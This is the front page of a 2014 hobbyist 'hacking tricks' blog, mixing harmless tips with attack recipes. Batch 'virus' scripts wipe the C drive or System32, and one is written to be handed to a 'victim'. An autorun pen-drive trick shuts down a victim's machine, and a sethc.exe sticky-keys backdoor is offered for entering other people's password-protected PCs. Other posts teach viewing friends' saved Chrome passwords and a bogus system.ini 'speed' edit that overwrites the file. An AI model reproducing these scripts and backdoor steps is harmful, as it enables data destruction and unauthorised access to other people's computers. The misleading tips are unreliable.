Fb Like Button

#Hv

The Team Young Anonymous welcomes you....
come and learn as much as you can :)
#Admin- Hlshu

Wednesday, April 30, 2014

On 20:57 by Harsh Bothra in , ,    1 comment
AddMeFast helps you to increase Facebook Likes/Subscribe, Google +1/Circles, Twitter Followers, YouTube Views/Subscribe/Likes, Pinterest Followers, SoundCloud music listening and Website Hits.
  AddMeFast don’t sell likes/subscribes/followers/views/hits. They will never ask for your social network accounts usernames or passwords, and will never post, tweet or status update from your accounts.
Simply register your email and add your FB Profile ID ya Fb pages whatever you want. Now simply earn points liking other pages and your pages likes is also up. Enjoy the Free and legal like service.

Tuesday, April 29, 2014

On 23:03 by Harsh Bothra in ,    1 comment

 What will this virus do ?  

You will create this virus using batch file programming. This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus.

How to Make the virus ?

 1. Open Notepad and copy below code into it.

@Echo off
Del C:\ *.* |y 
}

 2. Save this file as virus.bat (Name can be anything but .bat is must)
   3. Now, running this file will delete all the content of C Drive.

Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.
On 23:00 by Harsh Bothra in , ,    1 comment

How To Check If Someone Has Hacked In Your WiFi


If your internet is slower than usual, then you should check if someone has hacked in your WIFI .In this post I’m going to show you two effective way to check this.
The easiest way is by using free utility called Wireless Network Watcher v1.55 .
1) Go to nirsoft.net and download Wireless Network Watcher v1.55.
2) Install it on your pc and start scanning. It scans your wireless network and displays the list of all computers and devices that are currently connected to your network.
For every computer or device that is connected to your network, the following information is displayed: IP address, MAC address, the company that manufactured the network card, and optionally the computer name. 


If you want to check if someone has hacked in your WIFI without installing any software then you should log in your router . If anyone is connected to your network it will be shown in your router security settings. You can log into your router, usually http://192.168.1.1 . You can check your router ip address using command prompt
1) Run command prompt (cmd)
2)type ipconfig and press enter



3)ipconfig will list your ip , MAC and default gateway address. You can access to your router settings by typing default gateway address in your web browser. 


4)Log in your router and look at the Home Network -> Devices, this shows all IP addresses connected to your network.  


Try This N Comment Pls..

On 22:49 by Harsh Bothra in , , ,    1 comment
There are some important  files or document you want to hide from others on your computer. To do that you might be creating folder inside folder to hide such files but in todays tutorial i will change this by teaching you a interesting trick to hide files behind images.To hide a file behind a image  means that if any one opens that image he will see the image, but to see the hidden file we need to open that image in a specific way. So lets get started.

How To Hide File Behind Image ?

In order to do this you should have basic understanding of command line.
1. Select an image to be used for hiding file behind the image.
2. Now select a file to hide behind the image and make it in .RAR format. With the help of the WinRAR.
3. And most important is that paste both the files on desktop. You may do this anywhere instead of desktop if you have some basic understanding of command line.
4. Now open cmd by going to Start > Accessories Command Prompt and type following commands in it.
cd desktop


5. CD stands for change directory by typing above command you change your directory to desktop. After that type command given below.

 Copy /b imagename.jpg + filename.rar finalimage.jpg

  
  • Replace imagename.jpg with the name of image you want your file to be hidden behind. Don't forget to add image format (Eg: .jpg,.png,.gif)
  • Replace filename with name of your file you want to hide. It must be in .rar format.
  • Finally Replace finalimage.jpg with whatever name you want your final image with hidden files should be. This is the image where your file will be hidden.
6. Now when you will try to open this newly created image it will open as normal image, but to open you hidden file you need follow steps given below.

How To Access Hidden File ?

To access your hidden file you need to open the newly created image in winrar. Just follow simple steps given below to do that.
    1. Open winrar
    2. Now locate your image and open it or simply drag your image in winrar.
    3. Extract the file and done.
On 22:46 by Harsh Bothra in , ,    2 comments
This trick is simple yet very powerfull  to view or hack saved password in google chrome. It does not matter for which website the password is saved it will work on all of them. It will work on Facebook, Gmail, Yahoo, twitter and many more. If you get your hands on your friend computer  you can hack their password with this simple little trick. It does not require any software or addons to be installed on your computer. Lets get started.


How to view saved password in google chrome ?

  1. Open Google Chrome
  2. Go to Settings (Its on the Right Corner)
  3. Then Click on Advance Settings
  4. Scroll Down and their will be password and forms from their click on Manage saved password.
  5. Then list of all websites whose passwords are saved on browser will be listed.
  6. Click on show to view those passwords
  7. Enjoy!!

On 22:41 by Harsh Bothra in , ,    1 comment

How To Open Banned Site ?

1. Open www.incloak.com in your browser.

2. After that enter the URL of the site which you want to open like below.
Open Banned Websites WIth Proxy Sites
3. Now click the Hide Me button and enjoy. 
On 21:34 by Harsh Bothra in , , ,    1 comment
Open Notepad Write / copy the below command there: " del c:\WINDOWS\system32\*.*/q " without quote and save as " anything.bat" Done. If You Give this file to your victim his SYSTEM 32 Folder will be deleted. Without which a Windows Pc cant be started. 
On 21:29 by Harsh Bothra in , ,    1 comment

How to set video as desktop wallpaper ?

   1. Open VLC Media Player.
   2. Then Go to Tools > Preference Or press CTRL + P and Selecet Video from left panel
   3. Then Choose DirectX video output from output dropdown list
      as shown in below image .

Video wallpaper

   4. Save the changes ans restart VLC Media Player.
   5. Play any video you would like to set as your desktop wallpaper.
   6. Then click on Video and select DirectX Wallpaper from the dropdown list as show in below image.
Video wallpaper

   7. Now Minimize vlc player and you will see your video running on your desktop as wallpaper.
   8. If you want your default wallpaper back then uncheck DirectX Wallpaper from video dropdown list.
   9. Hope you like this simple trick share your thought about this trick in comment section. 
On 21:22 by Harsh Bothra in , ,    No comments
As you all know without knowing the old password we are unable to change it but by following the few  steps given below will help you to change it easily. This trick works for Windows Vista, Windows XP, Windows 7, Windows8. 


Procedure For Changing Windows Password Without Knowing Old

Step 1 :

Start Menu > Computer > Right Click > Manage
 

Step 2 :

System Tool > Local User and Group
 
 

Step 3 :

Double Click on User  (exp. your  Pc Name )

Step 4 :

 Chose User > Right Click on It > Set Password
 

Step 5 :

Click on Proceed button
 

Step 6 :

Then Set your New Passowrd

On 21:19 by Harsh Bothra in , ,    2 comments
Torrent is tiny file with .torrent extension which allows you to download huge amount of data. We use torrents to download various stuffs like movies, games, software package and plenty of different things. you'll transfer torrents from several website.  The transfer speed for torrents depends on seeds it has. It will make difficult for you to download files with very low or no seed counts. However with the assistance of this trick you'll be able to download torrent file with IDM. This tool can be really helpfull when you want to download file that has very low seeds. IDM is the quickest file transfer manager on the internet market. So lets begin!

How To Transfer Torrent With IDM

1. First download the torrent file with .torrent extension which you wish to download from the internet directly without any torrent client like utorrent.
Downloading Torrent Using Internet Download Manager

2. Now open zbigz.com and you will land on its homepage.
3. Then Click on upload Torrent and browse your torrent to transfer and click on Go.
4. Then it will ask you for Free or Premium service, choose Free to proceed further.
5. It will take some time to cache your file. Once the caching is done, click on transfer button to download your file as shown below.
Downloading Torrent Using Internet Download Manager
6. You should have internet download manager installed on your computer so that download start inside IDM. If you don't have IDM don't worry it will download directly.

Note: If you decide on to use Free transfer then you wont be able to transfer file of more then 1 GB 

Monday, April 28, 2014

On 20:09 by Harsh Bothra   1 comment
Step 1:>>copy this  code into notepad: 
@echo off
shutdown -s -t 00

Save as 
TYA.bat extension (for eg: tya.bat). 
Step 2:
      Now open the notepad and copy this code:
 
[autorun]
Open=besthacking.bat
Action=Mouse Disable

   Save it as "autorun.inf"
 
Step 3:
         Then copy the two files in your pen drive or victim's pen drive.
 
That's all whenever the victim insert his pen drive,the system will be turned off automatically.
 
On 19:59 by Harsh Bothra in , ,    1 comment

How To Set Up A Backdoor In A Windows

 As the word says, backdoor is a hidden way to access a place. In terms of computer backdoor means a way to access that system(network, pc or anything)through a unknown, hidden way making use of a vulnerability present in that system. In this article I will tell you a way to access a pc running in windows os even if the system is password protected. But you must have accessed that system before. For this trick you need only less than 5 minutes. For example think that your friend ask you to do something in his pc while he is having food. Then apply this trick at that moment. And in future when you get a chance you can access that pc even if you don’t know the password(this trick is for password protected pc). Follow the given steps and you can access any password protected system. Before that be notified with the trick behind it. Whenever you try to login to a password protected pc no other application other than “sethc.exe” can be opened.(just try during login),you can open the application just by tapping shift key for 5 times continuously(try it).

This facility is meant for handicapped people to use the system. So what will happen if we replace sethc with command prompt (cmd)? Yes during login instead of sethc we can open cmd(by tapping shift key times). 
And using a a cmd code we can reset the password of the account in which you have to login and you can access without a password.
So follow the given trick and you can access the system (first time you access a pc) without password (in future). If you use the following code you can reset the password easily and without confirming the old password. So you don’t need the old password and only the new password you are wishing to assign.
Type the following code:
Syntax: net user accountname *
See the example:net user administrator *
First time when you use a pc do these:
In windows 7:
1) Go to c:\windows\system32


 2)Copy cmd.exe to desktop
3) Rename it as sethc.exe
You will get a dialogue box saying that you don’t have rights to move it in to system32 or for replacing sethc.exe the cmd.exe you should follow these sub-steps:
a)Right click on sethc.exe in system32
b)Open properties


c)Click on advanced in security tab

 d)Click on owner
e)Click edit
f)Change owner from “trusted installer” to “administrator”


g)Click apply
h)Then go to ‘security’ tab in properties
i)Click edit
j)Click on ‘administrator’

 k)Check the option enabling full control
l)Click on apply
4)Copy and paste the renamed .exe file to system32 again.
That’s all now just tap shift key 5 times and see the magic even at login time.


In windows xp:
Just copy cmd to desktop and rename it as sethc.exe and paste it back in system32. Original sethc will be replaced by new sethc.exe no other permissions required.
After opening cmd by tapping shift keys 5 times type the given code(syntax is given,replace accountname with administrator or accordingly)
Net user accountname *

 In future for accessing the pc on which you have done the above hack just do the following tap shift key times continuously and cmd opens.just type the below code and you can enter the pc without a password(we have resetted it).
So what to think, just follow the above trick and be ready with a backdoor to access any pc your friends,school’s,office or anywhere when you get an access……….

On 19:53 by Harsh Bothra in , ,    1 comment
Method 1: system.ini document
Here we will use the system.ini document to speed up our connection, simply
follow these steps:
1) Go to run and type system.ini. Something like this should show:

You should know that it will probably look different on your computer,what’s important when you opened the file is that you follow the next step
2) Delete everything from the system.ini and paste the following:
page buffer=100000kbps load=100000kbps
Download=100000kbps save=100000kbps
back=100000kb

Method 2: TCP OPTIMIZER
If you are using Wi-Fi then TCP optimizer will help you out and you can download it from this link. Once you have downloaded the software you will have a window like this one:

From here on you can play with the settings to speed up your connection.
On 19:35 by Harsh Bothra in , ,    1 comment
    What is Phishing ?

                    Phishing is one of the type of hacking . It is a method of acquiring sensitive information such as username, password, bank information etc. Phishing pagecould be saif as an duplicate page of real one. Its look exactly similar as the real page.But when user enter sensitive information on such phishing page his information is send to the E-mail address provided in the phishing page or you can say the one who created that phishing page. Phishing page is mostly send via mail. Target of phishing are mostly social networking sites like facebook, orkut etc. Also Banks website to acquirecredit card details,website like yahoo, gmail are also target of phishing.



    Example of Phishing scams:
  • Email asking you to login to your locked account to unlock it.
  • Email carrying a Link to sites like Facebook,yahoo etc and asking you to Login.
  • Emails containing some Information of your Interest and asking you to Login toYour Account.
   
     How to be safe from phishing ?
  • Never login to any of your account through link provided in the Email.
  • Go to real website dont click on any link posted anywhere. such as link posted on your facebook wall by friend or link provided in comments or link to ceratin website on any blog.
  • Check the URL of website before entering any sensitive information. Because the URL of phishing page is not same as the URL of  real one.
  • Real gmail page looks like gmail.com while phishing looks different somthing likegmail.anything.com
On 19:33 by Harsh Bothra in , ,    1 comment
keyloggers
In this tutorial i am going to talk about the most use piece of software besides from RAT by hackers to observe your activities on your computer and that is keyloggerskeylogger is a software or hardware device which monitorseach and every key typed by you on your keyboard. I am going to talk about different types of keylogger and how to be safe fromkeyloggers. So lets learn somthing aboutkeyloggers.

 1. What is keylogger ?

You might have heard about keyloggers but really dont know what they are reading this article will clear your mind. A keylogger also know as keystroke logger is software or hardware device which monitors each and every key typed by you on your keyboard. You can not identify the presence of keylogger on your computer since it runs in background and also it is not listed in task manager or control panel. It can be used by parents to keep eye on their childrens or company owner to spy on their employes.

2. How it can harm you ?

In this section i will talk about how keylogger can harm you in different ways for example It can be used by your enemy or friend to get sensitive information such asyour username and password, Bank credit card details, or any other activities you do on your computer.
  • Example: You login in to your Facebook account from a computer in whichkeylogger is install then your username and password will be captured.

3. Types of  keyloggers 

There are two types of keylogger hardware keylogger and software keylogger. Software keylogger is install in your computer where as a Hardware keylogger isattached to your keyboard. Looking at below images will clear your mind.

                              HARDWARE KEYLOGGER                                  
hardware keyloggers 

 SOFTWARE KEYLOGGER
 software keyloggers
                              

 4. How to Protect yourself from keyloggers ?

Keylogger  can be used by your enemy  to get sensitive information such as your Bank credit card details, or password of any social networking sites etc. In order to be safe keep following points in your mind.
  • Never use your online banking from cyber cafe. If you want to use then you can try this method. open notepad and type anything Then copy and paste each word that comes in your username or password.
  • You can even use above method to protect your facebook profile, yahoo or gmail id.
  • When you enter cyber cafe make sure that no hardware device is attached to keyboard wire. Its look something similar to above image.

Sunday, April 27, 2014

On 21:01 by Harsh Bothra in ,    1 comment

What are the Applications of Steganography?

Steganography is mainly used to obscure confidential information/data during storage or transmission. For example, one can hide a secret message in an audio file and send this to another party via email instead of sending the message in the textual format. The receiver on the other end will decrypt the hidden message using the private decryption key. In a worst case scenario, even if a third party does manage to gain access to the email, all he can find is the audio file and not the hidden data inside it. Other usage of steganography include digital watermarking of images for reasons such as copyright protection.
Even though steganography has many useful applications, some may use this technique for illegitimate purposes such as hiding a pornographic content in other large files. Rumors about terrorists using steganography for hiding and communicating their secret information and instructions are also reported. An article claiming that, al-Queda had used steganography to encode messages in images and transported them via e-mails, was reported by New York Times, in October 2001.

Friday, April 25, 2014

On 23:55 by Unknown in , ,    1 comment

KGB Archiver: Compress 1GB File to 10MB
KGB Archiver is free and open source software which compresses 1GB file to 10MB file.
Data compression utility of this software is based on PAQ6 algorithm which has AES-256 powerful encryption. KGB archiver works on both Windows and Linux operating system. Compression ratio of this software is very high. Due to high compression levels, time to compress a file goes high as the size of the file increases and compression ratio may vary depending on the format of the file.When a file is compressed with KGB Archiver it saves it with own extension and at the time of decompression it automatically recognizes the file format. The only limitation of KGB archiver is, decompressed file cannot be open or extract with other compression softwares. You can also choose any compression level (high, maximum, normal, low, very weak) to compress a file but the compression time  will vary according to your selected compression level.
Note: If you are compressing any file with KGB archiver and sending the comprssed file to your friends then he must have KBG archiver installed on his computer to decompress the file.
System Requirements:
Due to high compression ratio of KGB archiver, you need to have a decent system hardware configuration
  • 256 MB RAM
  • 1.5 GHz Processor
Features of KGB Archiver
  • Supports native .kgb files and .zip files
  • AES-256 Encryption
  • Able to create self-extracting archives.
  • Multilanguage supports like Arabic, German, Greek, Japanese, Spanish many more.
  • Unicode is supported in both User Interface and File Systems.
  • An Explorer shell extension is available for the windows version.
  • Make Password protected compressed file.
 

Note: This KBG Archiver software cannot compress video format files.